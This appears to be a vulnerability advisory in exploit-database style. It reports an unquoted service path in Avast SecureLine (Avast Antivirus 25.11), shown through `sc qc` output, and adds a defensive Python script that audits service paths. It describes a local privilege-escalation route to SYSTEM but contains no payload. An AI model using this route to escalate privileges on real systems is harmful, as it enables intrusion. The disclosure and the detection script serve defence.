# Exploit Title: AVAST Antivirus 25.11 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Date: 2025-12-17
# Vendor Homepage: https://www.avast.com/
# Software Link: https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
# Tested Version: 25.11
# Tested on OS: Windows 11

Description

AVAST Antivirus 25.11 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated SYSTEM privileges. Attackers can exploit the unquoted service path configuration to inject malicious executables that will be run with high-level system permissions. The affected service is SecureLine (Avast SecureLine): it starts automatically, runs as LocalSystem, and its binary path contains spaces but is not enclosed in quotes.

PoC

C:\>sc qc SecureLine
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SecureLine
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Avast SecureLine
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
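
Audit check for the condition shown in the PoC output above, as an added example that is not part of the original advisory or of Avast's code: it reads `sc qc` output (English or Spanish labels), separates the executable from its arguments, and reports whether the image path is unquoted with a space, together with the quoted form. The function names and the second sample service (ExampleSvc) are assumptions made for illustration.

```python
import re

# Labels sc.exe uses for the image path: English, and Spanish as in the output above.
PATH_LABELS = {"BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO"}

# Constructed sample: service name and binary path lines taken from the PoC output.
PAGE_SAMPLE = r"""
NOMBRE_SERVICIO: SecureLine
        NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
"""
# Constructed, hypothetical service whose path is already quoted and takes an argument.
QUOTED_SAMPLE = r"""
SERVICE_NAME: ExampleSvc
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" --run
"""

def binary_path(sc_output):
    """Return the image path value from `sc qc` output, or None if absent."""
    for line in sc_output.splitlines():
        label, sep, value = line.partition(":")  # first colon ends the label
        if sep and label.strip() in PATH_LABELS:
            return value.strip()
    return None

def split_image_path(path):
    """Split an image path into (executable, arguments, quoted)."""
    if path.startswith('"'):
        exe, _, rest = path[1:].partition('"')
        return exe, rest.strip(), True
    # Unquoted: the executable runs up to the first ".exe" that ends a token.
    m = re.match(r"(.*?\.exe)(?:\s+(.*))?$", path, re.IGNORECASE)
    if m:
        return m.group(1), m.group(2) or "", False
    return path, "", False

def audit(sc_output):
    """Return (vulnerable, path); path is the quoted form when vulnerable."""
    path = binary_path(sc_output)
    if path is None:
        return False, None
    exe, args, quoted = split_image_path(path)
    vulnerable = not quoted and " " in exe
    fixed = f'"{exe}"' + (f" {args}" if args else "")
    return vulnerable, fixed if vulnerable else path

if __name__ == "__main__":
    for sample in (PAGE_SAMPLE, QUOTED_SAMPLE):
        print(audit(sample))
```
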